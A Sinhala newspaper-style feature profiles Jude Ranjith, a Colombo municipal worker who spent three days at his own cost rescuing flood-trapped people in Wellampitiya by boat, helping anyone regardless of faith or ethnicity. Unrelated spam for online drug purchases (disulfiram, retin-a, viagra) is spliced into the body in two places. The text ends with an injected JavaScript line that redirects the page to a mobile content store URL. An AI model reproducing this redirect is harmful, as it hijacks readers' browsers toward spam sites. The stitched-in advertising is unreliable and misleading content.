ගංවතුරෙන් මතු වූ මනුස්සකමේ සියපත

 නිමල් අබේසිංහ

කොළඹ මෝදර ධීවර වරායේ කුඩා බෝට්ටුවක ඇණිය මත හිඳගෙන අපි කතා කළෙමු. ඔහු දුටු මොහොතෙහි ක්ෂණයකින් මගේ සිතට නැගුණේ මේ තරම් සියුමැලිද කළු ගල් නම් සුනිල් එදිරිසිංහ ගයන ජනප‍්‍රිය ගීතයයි. මාද පැමිණ ඇත්තේ ගීතයේ සඳහන් පරිදි අවුකන බුදුන්ටත් දෑස් දුන් මිනිසා වන් සැබෑ මිනිස්කමින් පිරුණු මිනිසකු හමුවන්නටය.

අව්වට කළු ගැසුණ මුත් ඔහුගේ වතින් උතුරා ගලා හැලෙන්නේ කරුණා දයාවයි. දවස පුරා ගත වෙහෙසන කම්කරුවකු මුත් ඔහු ලද දෙයින් සතුටු වන්නකු බව හොඳින්ම පෙනෙයි.

ව්‍යසනයකදී කෙනෙකුට උපකාර කර මෙන්න අපි කෙරුවා යැයි පම්පෝරි ගසන ඊනියා මානුෂීය පිහිටවන්නන්ට ඔහු අසල අලගු තබන්නටවත් නොහැකි බව කතාව ඇසූ පසු ඔබටම සිතෙනු නොඅනුමානය.

ඔහු නමින් පී.ඩබ්ලිව්.ඒ.ඞී. ජූඞ් රංජිත්ය. ජූඞ් මා අබියස සිට සිය හඬ අවදි කරයි.
‘මම වැඩ කරන්නේ කොළඹ නගර සභාවේ කම්කරුවෙක් විදියට. තොටළඟ මධ්‍යම මාර්ග නඩත්තු ඒකකයේ. එදා මැයි මාසේ දහඅටවෙනිදා. වැස්ස තිබුණත් මම උදේ වැඩට ගියා. වැඩට ගිහින් ටික වේලාවකින් මගේ නංගිගේ දුව සඳමාලි ෆෝන් කරලා ‘මාමේ කැලණි ගගේ වතුර මට්ටම එන්න එන්නම වැඩි වෙනවා, අපි දැන් ගංවතුරට කොටුවෙලා ඉන්නේ, බෝට්ටුවක් අරගෙන ඉක්මනට එන්න’ කීවා.
ඒ සැණින් ඔහු සිය ප‍්‍රධානියා සොයා ගිය මුත් ඔහු කාර්යාලයේ නොසිටියේය. ඊළඟට ගියේ දෙවෙනියා ළඟටය. ‘මැඩම් මගේ නංගිගේ දුවට කරදරයක් මට යන්න ඕනෑ’ ජූඞ් කීවේය.
‘ටෙක්නිකල් ඔෆිසර්ට කියලා යන්න.’ ඇය කීවාය.

‘ඊට පස්සේ මම පෑලියගොඩට ගිහින් ලොරියක් හයර් එකට කතා කරගෙන මෝදර වැල්ලට ආවා. මගේ යාළුවා ප‍්‍රදීප්ට දුරකථනයෙන් කතා කළා. එයාගේ බෝට්ටුව ඉල්ලගන්න. ඒත් දුරකථනය ක‍්‍රියා විරහිතයි. ඒ වුණත් මම බෝට්ටුව ලොරියට පටවා ගත්තා. බෙනඩික් කියන යාලූවාගෙන් තෙල් ටැංකියයි, එංජින් එකයි ඉල්ලාගත්තා. තවත් යාළුවෙකුගෙන් සේෆ්ටි ජැකට් දෙකක් ඉල්ලාගත්තා. තව යාළුවෙකුත් කතා කරගෙන කෙළින්ම නංගිලාගේ දුව සිටින වැල්ලම්පිටියේ පොල්වත්ත ප‍්‍රදේශයට යන්න පිටත් වුණා.’

ඔහුට ලොරියෙන් යා හැකි වූයේ ඔරුගොඩවත්ත පාලම අසලට පමණි. ගංවතුර පාලම වසාගෙනය. ඔහු මිතුරාද රියැදුරුද උදව් කරගෙන බෝට්ටුව ලොරියෙන් බාගෙන ලොරිය පිටත්කර යැව්වේය. අනතුරුව එන්ජිම බෝට්ටුවට සවිකර ගත්තේය. මෙහිදී ඔහුගේ මිතුරාට අමතරව තවත් අයෙක්ද උදව්වට ආවේය.
‘මායි, යාලූවායි බෝට්ටුවට එංජිම ෆිට් කරනකොට තවත් කෙනෙක් ඇවිල්ලා අපිට උදව් කළා. ඔහු මම කලින් අඳුනන කෙනෙකුත් නෙවෙයි. හැබැයි හිත හොඳ මිනිහෙක්. නම අෂ්රෆ්. එයා අපිත් එක්ක බෝට්ටුවෙ යන්නත් එකතු වුණා. ඇත්තටම එයා නොහිටියා නම් මට හරියට පාරවල් හොයාගන්නත් බැරිවෙනවා. ඉතින් මගේ යාළුවා මාකසුයි, අලූත් යාළුවා අෂ්රෆුයි ඉස්සරලාම ගියේ නංගිගේ දුවලාගේ ගෙදර සොයාගෙන.

ඒ ගිහින් නංගියි, නංගිගේ දුවයි, දුවගේ ළමයි තුන්දෙනායි, බෑනායි අහළ පහළ හිටපු පොඩි ළමයි ටිකකුයි, තව ගෑනු දෙන්නෙකුයි බෝට්ටුවට දාගත්තා. එයිට වැඩිය බෝට්ටුවට දාගන්න බෑ. මම බෝට්ටුවේ යනවා ඈත ඉඳන් දැකපු නංගිගෙ දුව, ජූඞ් මාමේ කියලා කෑගැහුවා. එයාගේ දරුවෝ ජූඞ් සීයේ කියලා කෑගැහැව්වා. මේක ඇහුණු අහළ පහළ හිටපු අනෙක් දරුවොත් ජූඞ් මාමේ, ජූඞ් සීයේ අපිවත් අරන් යන්න කියලා කෑගැහනවා. බෝට්ටුවට එයිට වඩා පටවන්න බෑ. මම ඒ අයටත් ආපහු එනවා කියලා බෝට්ටුව අරන් වැල්ලම්පිටිය පොලිසිය ළඟට ආවා. එතන උස් බිමක්. ඒ නිසා එතැන ඔක්කොමලා බැස්සුවා. ආයේ ගිහින් කට්ටිය පටවාගෙන ආවා. ඔය විදියට ? හතහමාර විතර වෙනකල් වතුරට කොටුවෙලා හිටපු අය ගෙනත් බැස්සුවා. සිංහලද, දෙමළද, මුස්ලිම්ද, ගෑනුද, පිරිමිද කියලා බැලූවේ නෑ.’
මේ වනවිට ගංවතුරට කොටු වූ පිරිස රැුගෙන ඒමට කිසිදු කෙනෙකු යොමු වී නොතිබුණි. ආණ්ඩුවෙන් පවා ඒ සඳහා යොමු වුණේ පසුදා බව ජූඞ් කියයි.

‘මම සෙනඟ අරගෙන එනකොට ගොඩබිමේ නේවි එකෙන් හිටියා. මම ඒ අයට කීවා ‘සර් ගංවතුරට කොටුවුණ අය ගොඩක් ඉන්නවා, බෝට්ටු දහයක් විතරවත් දාලා අදින්න වෙයි’ කියලා. ඒ වෙලාවේ ඒ අය මුකුත් කීවේ නෑ.
? වුණාට පස්සේ වතුරේ යන්න විදියක් නෑ. ඊට පස්සේ ඇන්ජිමයි, තෙල් ටැංකියයි ගලවලා වැල්ලම්පිටියේ පොලිසියේ තියලා ඇවිත් පහුවදා උදේම ආයෙත් ගියා. ඒ යනකොට බනිස් ටිකක්, බිස්කට් ටිකක්, බීම බෝතල් ටිකක් එහෙමත් අරගෙන ගියා. මොකද පොඩි ළමයි ගොඩක් හිටියා. ඒ අය හාමතේ ඇතිනේ කියලා හිතුණා. එදා නම් නේ්වි එකෙනුත් බෝට්ටු අරගෙන ඇවිත් තිබුණා. තව කට්ටියක් බෝට්ටු අරගෙන ඇවිත් තිබුණා.’
එදිනත් ජූඞ් අනෙක් අය සේම ගංවතුරට කොටුවූ අය බේරාගැනීමේ මෙහෙයුමේ යෙදුණේය. පසුදිනද ඒ මෙහෙවරට එකතු වුණේය.

‘සමහර තැන් තිබුණා නේවි එකටවත් යන්න බෑ. මොකද පාරවල් පටුයි ගිහින් බෝට්ටුව හරවාගන්න විදිහක් නැහැ. ඒත් මම ගියා. පුංචි කාලේ ඉඳන් මුහුදත් එක්ක ඔට්ටු වුණ අපිට වතුරට බයක් නෑ. ඒ ඒ වෙලාවට කරන්න ඕනෑ උපක‍්‍රම අපි දන්නවා. ’
‘මම කළේ මොකක්ද දන්නවාද’ ජූඞ් මගෙන් අසයි. මුහුදු වැල්ලට ගොස් රැුල්ල විතරක් පාගා ඇති මට ඒ ගැන කිසිවක් සිතාගන්නටවත් නොහැකිය.
‘ඔය පාරවල්වල ලයිට් කණු තියෙනවානේ. ඒවායේ ලණුවක් බැඳලා බෝට්ටුවේ බඳිනවා. ඊට පස්සේ එංජිම ස්ටාර්ට් එකේ තියාගෙන බෝට්ටුව රිවෙස් එකට අරගෙන යනවා. එතකොට හරවන්න ඕනෑ නෑ. සෙනඟ අරන් ඉස්සරහට එන්න පුළුවන්. මම යනකොට ඒවාට අවශ්‍ය කඹ එහෙමත් අරගෙනයි ගියේ.’ හරවන්න අපහසු තැන්වලට බෝට්ටුව රැුගෙන ගිය උපක‍්‍රමය ජූඞ් මට කියා දුන්නේය.

buy disulfiram in usa. general health. discount system, gums new, women’s health , antibiotics.

දින තුනක් පුරා ස්වේච්ඡුාවෙන් සිය වියදමින් බෝට්ටුව රැගෙන ගොස් ගණන් මිනුම් නැතිව ගංවතුරට කොටුවූ මිනිසුන් රැුගෙන එන්නට ජූඞ් කැපවුණේ රටට ලෝකයට සිය පරකාසය කියන්නට නම් නොවේ.
‘ඇත්තටම මම ඉස්සරලාම මගේ නංගිගේ දුවයි, පවුලේ අයයි බේරගන්නයි ගියේ. ඕනෑ නම් ඒ අය අරගෙන ඇවිත් මට නතරවෙන්න තිබුණා. ඒ වුණාට අසරණ වෙලා හිටපු මිනිස්සු දැක්කාම මට නම් එහෙම කරන්න හිත දුන්නේ නෑ. අඩුම තරමේ මම ඒ අයගෙන් සිගරට් එකක්වත් බොන්නේ නෑ කියලා හිතුවා. එහෙම කළා නම් මම කරපු වැඩෙන් තේරුමක් නෑනේ.’

ජූඞ් සිත පමණක් නොවෙයි හදවතද විවර කරයි. ව්‍යසනයකදී ඒවාට ගොදුරුවූවන්ගේ දේපළ පමණක්් නොව අතේ කරේ පැළඳ සිටින රන් බඩු පවා කොල්ලකන නරුමයන් ගැන කතා අපි කොතෙකුත් අසා ඇත්තෙමු. එහෙත් වන සිව්පාවුන් මැද දෙවි දේවතාවුන් ඇතැයි සිතෙන්නේ ජූඞ් බඳු මිනිසුන් දකින විටය.
ගංවතුරෙන් කොටුවූ මිනිසුන් බේරාගැනීමේ මෙහෙයුමේදී ජූඞ් අත්විඳි සහ ඔහුගේ සිත සසළ කළ සිද්ධිද නැතිවා නොවේ.
‘පළවෙනි දවසේ මමයි අෂ්රොෆුයි, මාකසුයි යනකොට එක ගෙදරක උඩ තට්ටුවේ ඉඳන් තරුණ යුවලක් කෑගැහැව්වා. ඒ අය ගන්න ගියාම ඉස්සරලාම දරුවෙක් කූඩයක දාලා ලණුවකින් බෑවා. මම බෝට්ටුවේ ඇණියෙ නැගිටලා ඉඳන් බොහොම පරිස්සමට කූඬේ අල්ලාගෙන දරුවා බෝට්ටුවට ගත්තා.’
‘දන්නවද මේ දරුවාගේ වයස?’
ජූඞ් මගෙන් අසයි. මම ඔහුගේ මුහුණ දෙස බැලූවෙමි. ඔහුගේ වත හැඟීම්බරය. දෙනෙතෙහි කඳුළක් මෝදු වී ගෙන එයි. මඳ විරාමයකින් පසුව ‘සති තුනයි’ යන්න ඔහුගෙන් පිටවෙයි.
‘ඊට පස්සේ අර තරුණ යුවලත් බෝට්ටුවට අරගත්තා.’
‘මුස්ලිම් අය’ ඔහු කියයි.

‘තුන්වෙනි දවසේ පන්සලක හිටපු බොහොම මහලූ ජෝඩුවකට ඒගොල්ලන්ගෙ ඥාති ගෙදරකට යන්න ඕනෑ වෙලා. මට කීවා වතුරෙන් එගොඩ කරන්න කියලා. මේ දෙන්නාම හැරමිටි වාරුවෙන් යන අය. ඒ දෙන්නාත් එගොඩ කළාම ‘අනේ පුතේ උඹ බුදුවෙන්න ඕනෑ’ කීවා. ඒ අය දන්නේ නෑ මම කතෝලිකයෙක් කියලා.’ ජූඞ්ගේ මුවට මඳහසක් නැගෙයි.

buying retin-a online safe free viagra samples – the conway muse

‘පළවෙනි දවසේ එක්තරා අවස්ථාවකදී ගෑනු කෙනෙක් බෝට්ටුවට ගන්න යනකොට එයා වතුරට වැටුණා. අෂ්රෆ් වතුරට පැනලා ඒ ගෑනු කෙනාව උස්සලා අරන් බෝට්ටුවට නැග්ගෙව්වා. ගෑනු කෙනා සිංහල. නියම මිනිස්සු කරදරයකට පත්වුණු කෙනාගේ ජාතිය, ආගම හොයන්නේ නෑ. ඒ අතින් අෂ්රෆ් නියම මිනිහෙක්. එයා මගේ බෝට්ටුවට නැග්ගේ මුස්ලිම් අය බේරගන්න නෙමෙයිනේ.
දෙවෙනි දවසේ නම් බොහොම කනගාටුදායක සිද්ධියක් මම දැක්කා. එක්තරා මුස්ලිම් පිරිසක් බෝට්ටුවලින් ඇවිල්ලා ඒගොල්ලන්ගේ අය විතරක් අරගෙන ගියා. ඒ අය බෝට්ටු අරන් ඇවිත් තිබුණේ කුලියට.’

එසේ වුවත් මේ නම් යහපත් දෙයක් නොවෙයි. කුමක් කරන්නද. අෂ්රොෆ්ලා, ජූඞ්ලා, කරුණාදාසලා සැමතැනම නොසිටිති. ඒ ලෝකයේ හැටිය.
‘දැන් මම දවස් තුනක් වැඩට නොගිහින්නේ බෝට්ටුව අරන් ගිහින් සෙනඟ ඇද්දේ. ඒ දවස් තුන නෝ පේ. නිවාඩුත් නෑ. හැබැයි ගංවතුරට කොටුවුණ අයට දවස් තුනක් නිවාඩු දෙන්න වැඩසටහනක් ක‍්‍රියාත්මකයි. ඒත් අපි ගංවතුරට අහුවුණේ නෑ. හැබැයි මම දවස් තුනේම ගංවතුරේ හිටියේ.’
රට කරවන අය මෙන්ම ජූඞ්ගේ ආයතන ප‍්‍රධානීන්ද මේ ගැනත් අවධානය යොමු කිරීම නම් වටිනේය. වෙන රටක නම් ජූඞ්ලා වීරත්වයෙන් පිදුම් ලබති. ඒත් අපේ රටේ පිදුම් ලබන්නේ ගොම රිටිය.

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;